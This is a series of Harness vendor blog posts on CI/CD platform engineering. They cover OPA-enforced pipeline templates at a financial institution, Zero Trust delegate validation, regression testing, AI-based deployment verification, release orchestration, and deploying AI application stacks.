Pipelines complete in minutes. Deployments that once required carefully coordinated release windows now happen dozens of times per day. Platform engineering teams have succeeded in giving developers unprecedented autonomy, enabling them to build, test, and deploy their services with remarkable speed.
Yet in highly regulated environments-especially in the financial services sector-speed alone cannot be the objective.
Control matters. Consistency matters. And perhaps most importantly, auditability matters.
In these environments, the real measure of a successful delivery platform is not only how quickly code moves through a pipeline. It is also how reliably the platform ensures that production changes are controlled, traceable, and compliant with governance standards.
Sometimes the most successful deployment pipeline is the one that never reaches production.
This is the story of how one enterprise platform team redesigned their delivery architecture to ensure that production pipelines remained governed, auditable, and secure by design.
A large financial institution had successfully adopted Harness for CI and CD across multiple engineering teams.
From a delivery perspective, the transformation looked extremely successful. Developers were productive, teams could create pipelines quickly, and deployments flowed smoothly through various non-production environments used for integration testing and validation. From the outside, the platform appeared healthy and efficient.
But during a platform architecture review, a deceptively simple question surfaced:
“What prevents someone from modifying a production pipeline directly?”
There had been no incidents. No production outages had been traced back to pipeline misconfiguration. No alarms had been raised by security or audit teams.
However, when the platform engineers examined the system more closely, they realized something concerning.
Production pipelines could still be modified manually.
In practice this meant governance relied largely on process discipline rather than platform enforcement. Engineers were expected to follow the right process, but the platform itself did not technically prevent deviations. In regulated industries, that is a risky place to be.
The platform team at the financial institution decided to rethink the delivery architecture entirely. Their redesign was guided by a simple but powerful principle:
Pipelines should be authored in a non-prod organization and executed in the production organization. And, if additional segregation was needed due to compliance, the team could decide to split into two separate accounts.
Authoring and experimentation should happen in a safe environment. Execution should occur in a controlled one.
Instead of creating additional tenants or separate accounts, the platform team decided to go with a dedicated non-prod organization within the same Harness account. This organization effectively acted as a staging environment for pipeline design and validation.

This separation introduced a clear lifecycle for pipeline evolution.
The non-prod organization became the staging environment where pipeline templates could be developed, tested, and refined. Engineers could experiment safely without impacting production governance.
The production organization, by contrast, became an execution environment. Pipelines there were not designed or modified freely. They were consumed from approved templates.
The first guardrail introduced by the platform team was straightforward but powerful.
Production pipelines must always be created from account-level templates.
Handcrafted pipelines were no longer allowed. Project-level template shortcuts were also prohibited, ensuring that governance could not be bypassed unintentionally.
This rule was enforced directly through OPA policies in Harness.
package harness.cicd.pipeline
deny[msg] {
template_scope := input.pipeline.template.scope
template_scope != "account"
msg = "pipeline can only be created from account level pipeline template"
}
This policy ensured that production pipelines were standardized by design. Engineers could not create or modify arbitrary pipelines inside the production organization. Instead, they were required to build pipelines by selecting from approved templates that had been validated by the platform team.
As a result, production pipelines ceased to be ad-hoc configurations. They became governed platform artifacts.
Blocking unsafe pipelines in production was only part of the solution.
The platform team realized it would be even more effective to prevent non-compliant pipelines earlier in the lifecycle.
To accomplish this, they implemented structural guardrails within the non-prod organization used for pipeline staging. Templates could not even be saved unless they satisfied specific structural requirements defined by policy.
For example, templates were required to include mandatory stages, compliance checkpoints, and evidence collection steps necessary for audit traceability.
package harness.ci_cd
deny[msg] {
input.templates[_].stages == null
msg = "Template must have necessary stages defined"
}
deny[msg] {
some i
stages := input.templates[i].stages
stages == [Evidence_Collection]
msg = "Template must have necessary stages defined"
}
These guardrails ensured that every template contained required compliance stages such as Evidence Collection, making it impossible for teams to bypass mandatory governance steps during pipeline design.
Governance, in other words, became embedded directly into the pipeline architecture itself.
The next question the platform team addressed was where the canonical version of pipeline templates should reside.
The answer was clear: Git must become the source of truth.
Every template intended for production usage lived inside a repository where the main branch represented the official release line.
Direct pushes to the main branch were blocked. All changes required pull requests, and pull requests themselves were subject to approval workflows that mirrored enterprise change management practices.
.png)
This model introduced peer review, immutable change history, and a clear traceability chain connecting pipeline changes to formal change management records.
For auditors and platform leaders alike, this was a significant improvement.
Once governance mechanisms were in place, the promotion workflow itself became predictable and repeatable.
Engineers first authored and validated templates within the non-prod organization used for pipeline staging. There they could test pipelines using real deployments in controlled non-production environments.
The typical delivery flow followed a familiar sequence:

After validation, the template definition was committed to Git through a branch and promoted through a pull request. Required approvals ensured that platform engineers, security teams, and change management authorities could review the change before it reached the release line.
Once merged into main, the approved template became available for pipelines running in the production organization. Platform administrators ensured that naming conventions and version identifiers remained consistent so that teams consuming the template could easily track its evolution.
Finally, product teams created their production pipelines simply by selecting the approved template. Any attempt to bypass the template mechanism was automatically rejected by policy enforcement
Several months after the new architecture had been implemented, an engineer attempted to modify a deployment pipeline directly inside the production organization.
Under the previous architecture, that change would have succeeded immediately.
But now the platform rejected it. The pipeline violated the OPA rule because it was not created from an approved account-level template.
Instead of modifying the pipeline directly, the engineer followed the intended process: updating the template within the non-prod organization, submitting a pull request, obtaining the necessary approvals, merging the change to Git main, and then consuming the updated template in production.
The system had behaved exactly as intended. It prevented uncontrolled change in production.
The architecture introduced by the large financial institution delivered several key guarantees.
Production pipelines are standardized because they originate only from platform-approved templates. Governance is preserved because Git main serves as the official release line for pipeline definitions. Auditability improves dramatically because every pipeline change can be traced back to a pull request and associated change management approval. Finally, platform administrators retain the ability to control how templates evolve and how they are consumed in production environments.
Pipelines are often treated as simple automation scripts.
In reality they represent critical production infrastructure.
They define how code moves through the delivery system, how security scans are executed, how compliance evidence is collected, and ultimately how deployments reach production environments. If pipeline creation is uncontrolled, the entire delivery system becomes fragile.
The financial institution solved this problem with a remarkably simple model. Pipelines are built in the non-prod staging organization. Templates are promoted through Git governance workflows. Production pipelines consume those approved templates.
Nothing more. Nothing less.
Modern CI/CD platforms have dramatically accelerated the speed of software delivery.
But in regulated environments, the true achievement lies elsewhere. It lies in building a platform where developers move quickly, security remains embedded within the delivery workflow, governance is enforced automatically, and production environments remain protected from uncontrolled change.
That is not just CI/CD. That is platform engineering done right.


For the world’s largest financial institutions, places like Citi and National Australia Bank, shipping code fast is just part of the job. But at that scale, speed is nothing without a rock-solid security foundation. It’s the non-negotiable starting point for every release.
Most Harness users believe they are fully covered by our fine-grained Role-Based Access Control (RBAC) and Open Policy Agent (OPA). These are critical layers, but they share a common assumption: they trust the user or the process once the initial criteria are met. If you let someone control and execute a shell script, you’ve trusted them to a great extent.
But what happens when the person with the "right" permissions decides to go rogue? Or when a compromised account attempts to inject a malicious script into a trusted pipeline?
Harness is changing the security paradigm by moving beyond Policy as Code to a true Zero Trust model for your delivery infrastructure.
Traditional security models focus on the "Front Door." Once an employee is authenticated and their role is verified, the system trusts their actions. In a modern CI/CD environment, this means an engineer with "Edit" and "Execute" rights can potentially run arbitrary scripts on your infrastructure.
If that employee goes rogue or their credentials are stolen, RBAC won't stop them. OPA can control whether shell scripts are allowed at all, but it often struggles to parse the intent of a custom shell script in real-time.
The reality is that verify-at-the-door is a legacy mindset. We need to verify at execution time. CI/CD platforms are a supply-chain target that are often targeted. The recent attack against the Checkmarx GitHub Action has been a painful reminder of the lesson the Solarwinds fiasco should have taught the industry.
Harness Zero Trust is a new architectural layer that acts as a mandatory "interruption" service at the most critical point: the Harness Delegate (our lightweight runner in your infrastructure).
Instead of the Delegate simply executing tasks authorized by the control plane, it now operates on a "Never Trust, Always Verify" basis.
When Zero Trust is enabled, the Harness Delegate pauses before executing any task. It sends the full execution context to a Zero Trust Validator, a service hosted and controlled by your security team.
This context includes:
The Delegate waits a moment. Only if the validator returns a "True" signal does the task proceed. If the signal is "False," the execution is killed instantly.
By moving validation to the Delegate level, we provide a "Last Line of Defense" that hits several key enterprise requirements:
We built this capability alongside some of the world's most regulated institutions to ensure it doesn't become a bottleneck. It’s designed to be a silent guardian. It shuts down the 1% of rogue actions while the other 99% of your engineers continue to innovate at high velocity.
The bottom line: at Harness, we believe that the promise of AI-accelerated coding must be met with an equally advanced delivery safety net. We’re building out that safety net every day. Zero Trust is the next piece.


A financial services company ships code to production 47 times per day across 200+ microservices. Their secret isn't running fewer tests; it's running the right tests at the right time.
Modern regression testing must evolve beyond brittle test suites that break with every change. It requires intelligent test selection, process parallelization, flaky test detection, and governance that scales with your services.
Harness Continuous Integration brings these capabilities together: using machine learning to detect deployment anomalies and automatically roll back failures before they impact customers. This framework covers definitions, automation patterns, and scale strategies that turn regression testing into an operational advantage. Ready to deliver faster without fear?
Managing updates across hundreds of services makes regression testing a daily reality, not just a testing concept. Regression testing in CI/CD ensures that new code changes don’t break existing functionality as teams ship faster and more frequently. In modern microservices environments, intelligent regression testing is the difference between confident daily releases and constant production risk.
These terms often get used interchangeably, but they serve different purposes in your pipeline. Understanding the distinction helps you avoid both redundant test runs and dangerous coverage gaps.
In practice, you run them sequentially: retest the fix first, then run regression suites scoped to the affected services. For microservices environments with hundreds of interdependent services, this sequencing prevents cascade failures without creating deployment bottlenecks.
The challenge is deciding which regression tests to run. A small change to one service might affect three downstream dependencies, or even thirty. This is where governance rules help. You can set policies that automatically trigger retests on pull requests and broader regression suites at pre-production gates, scoping coverage based on change impact analysis rather than gut feel.
To summarize, Regression testing checks that existing functionality still works after a change. Retesting verifies that a specific bug fix works as intended. Both are essential, but they serve different purposes in CI/CD pipelines.
The regression testing process works best when it matches your delivery cadence and risk tolerance. Smart timing prevents bottlenecks while catching regressions before they reach users.
This layered approach balances speed with safety. Developers get immediate feedback while production deployments include comprehensive verification. Next, we'll explore why this structured approach becomes even more critical in microservices environments where a single change can cascade across dozens of services.
Modern enterprises managing hundreds of microservices face three critical challenges: changes that cascade across dependent systems, regulatory requirements demanding complete audit trails, and operational pressure to maintain uptime while accelerating delivery.
A single API change can break dozens of downstream services you didn't know depended on it.
Financial services, healthcare, and government sectors require documented proof that tests were executed and passed for every promotion.
Catching regressions before deployment saves exponentially more than fixing them during peak traffic.
With the stakes clear, the next question is which techniques to apply.
Once you've established where regression testing fits in your pipeline, the next question is which techniques to apply. Modern CI/CD demands regression testing that balances thoroughness with velocity. The most effective techniques fall into three categories: selective execution, integration safety, and production validation.
Once you've established where regression testing fits in your pipeline, the next question is which techniques to apply. Modern CI/CD demands regression testing that balances thoroughness with velocity. The most effective techniques fall into three categories: selective execution, integration safety, and production validation—with a few pragmatic variants you’ll use day-to-day.
These approaches work because they target specific failure modes. Smart selection outperforms broad coverage when you need both reliability and rapid feedback.
Managing regression testing across 200+ microservices doesn't require days of bespoke pipeline creation. Harness Continuous Integration provides the building blocks to transform testing from a coordination nightmare into an intelligent safety net that scales with your architecture.
Step 1: Generate pipelines with context-aware AI. Start by letting Harness AI build your pipelines based on industry best practices and the standards within your organization. The approach is interactive, and you can refine the pipelines with Harness as your guide. Ensure that the standard scanners are run.
Step 2: Codify golden paths with reusable templates. Create Harness pipeline templates that define when and how regression tests execute across your service ecosystem. These become standardized workflows embedding testing best practices while giving developers guided autonomy. When security policies change, update a single template and watch it propagate to all pipelines automatically.
Step 3: Enforce governance with Policy as Code. Use OPA policies in Harness to enforce minimum coverage thresholds and required approvals before production promotions. This ensures every service meets your regression standards without manual oversight.
With automation in place, the next step is avoiding the pitfalls that derail even well-designed pipelines.
Regression testing breaks down when flaky tests erode trust and slow suites block every pull request. These best practices focus on governance, speed optimization, and data stability.
Regression testing in CI/CD enables fast, confident delivery when it’s selective, automated, and governed by policy. Regression testing transforms from a release bottleneck into an automated protection layer when you apply the right strategies. Selective test prioritization, automated regression gates, and policy-backed governance create confidence without sacrificing speed.
The future belongs to organizations that make regression testing intelligent and seamless. When regression testing becomes part of your deployment workflow rather than an afterthought, shipping daily across hundreds of services becomes the norm.
Ready to see how context-aware AI, OPA policies, and automated test intelligence can accelerate your releases while maintaining enterprise governance? Explore Harness Continuous Integration and discover how leading teams turn regression testing into their competitive advantage.
These practical answers address timing, strategy, and operational decisions platform engineers encounter when implementing regression testing at scale.
Run targeted regression subsets on every pull request for fast feedback. Execute broader suites on the main branch merges with parallelization. Schedule comprehensive regression testing before production deployments, then use core end-to-end tests as synthetic testing during canary rollouts to catch issues under live traffic.
Retesting validates a specific bug fix — did the payment timeout issue get resolved? Regression testing ensures that the fix doesn’t break related functionality like order processing or inventory updates. Run retests first, then targeted regression suites scoped to affected services.
There's no universal number. Coverage requirements depend on risk tolerance, service criticality, and regulatory context. Focus on covering critical user paths and high-risk integration points rather than chasing percentage targets. Use policy-as-code to enforce minimum thresholds where compliance requires it, and supplement test coverage with AI-powered deployment verification to catch regressions that test suites miss.
No. Full regression on every commit creates bottlenecks. Use change-based test selection to run only tests affected by code modifications. Reserve comprehensive suites for nightly runs or pre-release gates. This approach maintains confidence while preserving velocity across your enterprise delivery pipelines.
Quarantine flaky tests immediately, rather than letting them block pipelines. Tag unstable tests, move them to separate jobs, and set clear SLAs for fixes. Use failure strategies like retry logic and conditional execution to handle intermittent issues while maintaining deployment flow.
Treat test code with the same rigor as application code. That means version control, code reviews, and regular cleanup of obsolete tests. Use policy-as-code to enforce coverage thresholds across teams, and leverage pipeline templates to standardize how regression suites execute across your service portfolio.
.jpg)
.jpg)
Eight years ago, we shipped Continuous Verification (CV) to solve one of the most miserable parts of a great engineer’s job: babysitting deployments.
The idea was simple but powerful. At 3:00 AM, your best engineers shouldn't be staring at dashboards waiting to see if a release went sideways. CV was designed to think like those engineers, watching your APM metrics, scanning your logs, and making the call for you. Roll forward or roll back, automatically, based on what the data actually said.
It worked. Customers loved it. Hundreds of teams stopped losing sleep over deployments.
But somewhere along the way, we noticed a new problem creeping in: setting up CV had become its own burden.
To get value from Continuous Verification, you had to know what to look for. Which metrics matter for this service? Which log patterns indicate trouble? Which thresholds separate a blip from a real incident?
When we talk to teams trying to use Argo Rollouts and set up automatic verification with its analysis templates, we hear that they hit the same challenges.
For teams with deep observability expertise, this was fine. For everyone else—and honestly, for experienced teams onboarding new services—it added friction that shouldn't exist. We’d solved the hardest part of deployments, but we’d left engineers with a new "homework assignment" just to get started.
That’s what AI Verification & Rollback is designed to fix.
AI Verification & Rollback builds directly on the CV foundation you already trust, but adds a layer of intelligence before the analysis even begins. Instead of requiring you to define your metrics and log queries upfront, the system queries your observability provider—via MCP server—at the moment of deployment to determine what actually matters for the service you just deployed.
What that means in practice:
At our user conference six months ago, we showed this running live—triggering a real deployment, watching the MCP server query Dynatrace for relevant signals, and walking through a live failure analysis that caught a bad release within minutes. The response was immediate. Engineers got it instantly, because it matched how they already think about post-deploy monitoring.
We’ve spent the past six months hardening what we showed you. A few highlights:
We're not declaring CV legacy today. AI Verification & Rollback is not yet a full replacement for traditional Continuous Verification across all use cases and customer configurations. CV remains the right choice for many teams, and we're committed to supporting it.
Bottom line: AI V&R is ready for many teams to use. It's available now, and for teams setting up verification for the first time—or looking to reduce the operational overhead of maintaining verification configs—it's the faster, smarter path forward.
The takeaway here is simple: If you've been putting off setting up Continuous Verification because of the configuration overhead, this is the version you were waiting for.
Ready to stop babysitting your releases? Drop the AI V&R step into your next pipeline and see what it finds.
How is your team currently handling the "3:00 AM dashboard stare"—and how much time would you save if the pipeline just told you why it rolled back?


AI has officially made writing code cheap.
Your developers are shipping more changes, across more microservices, more frequently than ever before. If you’re a developer, it feels like a golden age.
But for the Release Engineer? This isn't necessarily a celebration; it’s a scaling nightmare.
We’re currently seeing what I call the "AI delivery gap." It’s that uncomfortable space between the breakneck speed at which we can now generate code and the manual, spreadsheet-driven processes we still use to actually release it.
The reality is that while individual CI/CD pipelines might be automated, the coordination between them remains a stubbornly human bottleneck. We’ve automated the "how" of shipping code, but we’re still stuck in the Dark Ages when it comes to the "when" and "with whom."
Today, we are introducing Harness Release Orchestration alongside four other capabilities that ensure confident releases. Release Orchestration is designed to transform the release management process from a fragmented, manual effort into a standardized, visible, and scalable operation.

Most release engineers I talk to spend about 40% of their time "chasing humans for status." You’re checking Slack threads for sign-offs, updating Confluence pages, and obsessively watching spreadsheets to ensure Team A’s service doesn't break Team B’s dependency. (And let’s be honest, it usually does anyway.)
We could call it a team sport, but it’s really a multi-team sport. Teams from multiple services and functions need to come together to deliver a big release.
If we rely on a person to coordinate, we can’t move fast enough.
Harness Release Orchestration moves beyond the single pipeline. It introduces a process-based framework that acts as your release "blueprint."
Release management software isn’t an entirely new idea. It’s been tried before, but never widely adopted. The industry went wrong by building separate tools for continuous delivery and release orchestration.
With separate tools, you incur integration overhead, have multiple places to look, and experience awkwardness.
We’ve built ours alongside our CD experience, so everything is as seamless and fast as possible. Yes, this is for releases that are more complex than a simple microservice, which the app team delivers on their own. No, that doesn’t mean introducing big processes and standalone tools.
Here’s the “gotcha”: the biggest barrier to adopting a new release tool is the hassle of migrating. You likely have years of proven workflows documented in SharePoint/Confluence, in early-release management tools like XL Release, or in the fading memory of that one person who isn't allowed to retire.
Harness AI now handles the heavy lifting. Our AI Process Ingestion can instantly generate a comprehensive release process from a simple natural-language prompt, existing documentation, or export from a tool.
What used to take months of manual configuration now takes seconds. Simply put, we’re removing the friction of modernization.
For the Release Engineer, the goal is leverage. You shouldn't need to perform heroics every Friday night to ensure a successful release. (Though if you enjoy the adrenaline of a 2:00 AM war room, I suppose I can’t stop you.)
Harness Release Orchestration creates a standardized release motion that scales with AI-driven output. It allows you to move from being a "release waiter" to a "release architect."
AI made writing code cheap. Harness makes releasing it safe, scalable, and sustainable.


Engineering teams are generating more shippable code than ever before — and today, Harness is shipping five new capabilities designed to help teams release confidently. AI coding assistants lowered the barrier to writing software, and the volume of changes moving through delivery pipelines has grown accordingly. But the release process itself hasn't kept pace.
The evidence shows up in the data. In our 2026 State of DevOps Modernization Report, we surveyed 700 engineering teams about what AI-assisted development is actually doing to their delivery. The finding stands out: while 35% of the most active AI coding users are already releasing daily or more, those same teams have the highest rate of deployments needing remediation (22%) and the longest MTTR at 7.6 hours.
This is the velocity paradox: the faster teams can write code, the more pressure accumulates at the release, where the process hasn't changed nearly as much as the tooling that feeds it.
The AI Delivery Gap
What changed is well understood. For years, the bottleneck in software delivery was writing code. Developers couldn't produce changes fast enough to stress the release process. AI coding assistants changed that. Teams are now generating more change across more services, more frequently than before — but the tools for releasing that change are largely the same.
In the past, DevSecOps vendors built entire separate products to coordinate multi-team, multi-service releases. That made sense when CD pipelines were simpler. It doesn't make sense now. At AI speed, a separate tool means another context switch, another approval flow, and another human-in-the-loop at exactly the moment you need the system to move on its own.
The tools that help developers write code faster have created a delivery gap that only widens as adoption grows.
Today Harness is releasing five capabilities, all natively integrated into Continuous Delivery. Together, they cover the full arc of a modern release: coordinating changes across teams and services, verifying health in real time, managing schema changes alongside code, and progressively controlling feature exposure.
Release Orchestration replaces Slack threads, spreadsheets, and war-room calls that still coordinate most multi-team releases. Services and the teams supporting them move through shared orchestration logic with the same controls, gates, and sequence, so a release behaves like a system rather than a series of handoffs. And everything is seamlessly integrated with Harness Continuous Delivery, rather than in a separate tool.
AI-Powered Verification and Rollback connects to your existing observability stack, automatically identifies which signals matter for each release, and determines in real time whether a rollout should proceed, pause, or roll back. Most teams have rollback capability in theory. In practice it's an emergency procedure, not a routine one. Ancestry.com made it routine and saw a 50% reduction in overall production outages, with deployment-related incidents dropping significantly.
Database DevOps, now with Snowflake support, brings schema changes into the same pipeline as application code, so the two move together through the same controls with the same auditability. If a rollback is needed, the application and database schema can rollback together seamlessly. This matters especially for teams building AI applications on warehouse data, where schema changes are increasingly frequent and consequential.
Improved pipeline and policy support for feature flags and experimentation enables teams to deploy safely, and release progressively to the right users even though the number of releases is increasing due to AI-generated code. They can quickly measure impact on technical and business metrics, and stop or roll back when results are off track. All of this within a familiar Harness user interface they are already using for CI/CD.
Warehouse-Native Feature Management and Experimentation lets teams test features and measure business impact directly with data warehouses like Snowflake and Redshift, without ETL pipelines or shadow infrastructure. This way they can keep PII and behavioral data inside governed environments for compliance and security.
These aren't five separate features. They're one answer to one question: can we safely keep going at AI speed?
Traditional CD pipelines treat deployment as the finish line. The model Harness is building around treats it as one step in a longer sequence: application and database changes move through orchestrated pipelines together, verification checks real-time signals before a rollout continues, features are exposed progressively, and experiments measure actual business outcomes against governed data.
A release isn't complete when the pipeline finishes. It's complete when the system has confirmed the change is healthy, the exposure is intentional, and the outcome is understood.
That shift from deployment to verified outcome is what Harness customers say they need most. "AI has made it much easier to generate change, but that doesn't mean organizations are automatically better at releasing it," said Marc Pearce, Head of DevOps at Intelliflo. "Capabilities like these are exactly what teams need right now. The more you can standardize and automate that release motion, the more confidently you can scale."
The real shift here is operational. The work of coordinating a release today depends heavily on human judgment, informal communication, and organizational heroics. That worked when the volume of change was lower. As AI development accelerates, it's becoming the bottleneck.
The release process needs to become more standardized, more repeatable, and less dependent on any individual's ability to hold it together at the moment of deployment. Automation doesn't just make releases faster. It makes them more consistent, and consistency is what makes scaling safe.
For Ancestry.com, implementing Harness helped them achieve 99.9% uptime by cutting outages in half while accelerating deployment velocity threefold.
At Speedway Motors, progressive delivery and 20-second rollbacks enabled a move from biweekly releases to multiple deployments per day, with enough confidence to run five to 10 feature experiments per sprint.
AI made writing code cheap. Releasing that code safely, at scale, is still the hard part.
Harness Release Orchestration, AI-Powered Verification and Rollback, Database DevOps, Warehouse-Native Feature Management and Experimentation, and Improve Pipeline and Policy support for FME are available now. Learn more and book a demo.


For the past few years, the narrative around Artificial Intelligence has been dominated by what I like to call the "magic box" illusion. We assumed that deploying AI simply meant passing a user’s question through an API key to a Large Language Model (LLM) and waiting for a brilliant answer.
Today, we are building systems that can reason, access private databases, utilize tools, and—hopefully—correct their own mistakes. However, the reality is that while AI code generation tools are helping us write more code than ever , we are actually getting worse at shipping it. Google's DORA research found that delivery throughput is decreasing by 1.5% and stability is worsening by 7.5%. Deploying AI is no longer a machine learning experiment; it’s one of the most complex system integration challenges in modern software engineering.
That's why integrated CI/CD is no longer optional for AI deployment—it's the foundation. As teams adopt platforms like Harness Continuous Integration and Harness Continuous Delivery, testing and release orchestration shift from isolated checkpoints to continuous safeguards that protect quality and safety at every layer of the AI stack.
Most definitions of AI deployment are stuck in the "model era." They describe deployment as taking a trained model, wrapping it in an API, and integrating it into a single application to make predictions.
That description is technically accurate—but strategically wrong.
In 2026, AI deployment means:
Integrating a full AI application stack—models, prompts, data pipelines, RAG components, agents, tools, and guardrails—into your production environment so it can safely power real user workflows and business decisions.
You're not just deploying "a model." You are deploying the instructions that define the AI's behavior, the engines (LLMs and other models) that do the reasoning, the data and embeddings that feed those engines context, the RAG and orchestration code that glue everything together, the agents and tools that let AI take actions in your systems, and the guardrails and policies that keep it all safe, compliant, and affordable.
Classic "model deployment" was a single component behind a predictable API. Modern AI deployment is end‑to‑end, cross‑cutting, and deeply entangled with your existing software delivery process.
If you want a great reference for the more traditional view, IBM's overview of model deployment is a good baseline. But in this article, we're going to go beyond that to talk about the compound system you are actually shipping today.
The paradox of this moment is simple: coding has sped up, but delivery has slowed down.
AI coding assistants take mere seconds to generate the scaffolding. Platform teams spin up infrastructure on demand. Product leaders are under pressure to add "AI" to every experience. But in many organizations, the actual path from "we built it" to "it's safely in front of customers" is getting more fragile—instead of less.
There are a few reasons for this:
The result is what many teams are feeling right now: shipping AI features feels risky, brittle, and slow, even as the pressure to "move faster" keeps rising.
To fix that, we have to start with the stack itself.
To understand how to deploy AI, you have to stop treating it as a single entity. The modern AI application is a compound system of highly distinct, interdependent layers. If any single component in this stack fails or drifts, the entire application degrades.
A prompt is no longer just a text string typed into a chat window; it is the source code that dictates the behavior and persona of your application.
The LLM is the reasoning engine. It has vast general knowledge but zero awareness of your company’s proprietary data.
An AI's output is only as reliable as the context it is given. To make an LLM useful, it needs a continuous feed of your company’s internal data.
RAG is not a model; it is a separate software architecture deployed to act as the LLM's research assistant.
If RAG is a researcher, an AI Agent is an employee. Agents are LLMs given access to external tools. Instead of just answering a question, an agent can formulate a plan, search the web, and execute code.
You cannot expose a raw LLM or an autonomous agent to the public, or even to internal employees, without armor. Because AI is non-deterministic, traditional software security falls short. Modern AI deployment requires distinct "Guardrails as Code".
These kinds of controls are a natural fit for policy‑as‑code engines and CI/CD gates. With something like Harness Continuous Delivery & GitOps, you can enforce Open Policy Agent (OPA) rules at deployment time—ensuring that applications with missing or misconfigured input guardrails simply never make it to production.
Understanding the stack reveals the ultimate challenge: The Cascade Effect. In traditional software, a database error throws a clean error code. In an AI application, a bug in the data pipeline silently ruins everything downstream. This is why deployment cannot be disjointed. It requires rigorous Release Orchestration.
For years, we've been obsessed with specialized silos: MLOps, LLMOps, AgentOps. But a vital realization is sweeping the enterprise: the time of siloed, specialized AI operations tools is coming to an end.
The future belongs to unified release management. The organizations that succeed will not be the ones with the smartest standalone AI models, but the ones who master the orchestration required to deploy and evolve those models, alongside everything else they ship, safely, efficiently, and continuously.
If you want a platform that brings semantic testing, progressive rollouts, and coordinated AI releases into your day-to-day workflows, Harness Continuous Integration and Harness Continuous Delivery were built for this.
What is AI deployment?
AI deployment is the process of integrating AI systems, models, prompts, data pipelines, RAG architectures, agents, tools, and guardrails, into production environments so they can safely power real applications and business workflows.
How is AI deployment different from traditional model deployment?
Traditional model deployment focuses on serving a single model behind an API. Modern AI deployment involves a multi‑layer stack: instructions, engines, context, retrieval, agents, and policies. Failures are more likely to be silent regressions or unsafe behaviors than obvious crashes, which is why you need semantic testing, guardrails, and release orchestration.
How do you deploy AI safely in production?
Safe AI deployment starts with treating prompts and configurations as code, embedding guardrails at input, output, and action levels, and using semantic evaluation and progressive rollout strategies. It also requires immutable logging and audit trails so you can trace decisions back to specific versions of your AI stack. Combining CI for semantic tests with CD for orchestrated releases is the practical path to safety.
What tools are used for AI deployment?
Teams typically use a mix of LLM providers or model‑serving platforms, vector databases, observability tools, and CI/CD systems for orchestrating releases. On top of that, they add policy engines and specialized evaluation frameworks. The critical shift is moving from isolated "AI tools" to integrated pipelines that tie everything together.
How do canary releases work for AI models and prompts?
With canary releases, you send a small portion of traffic to the new behavior, a new model, prompt, or RAG strategy, while most users continue on the old path. You observe semantic quality, safety signals, and performance. If the canary behaves well, you gradually increase its share. If it misbehaves, you automatically roll back to the previous version.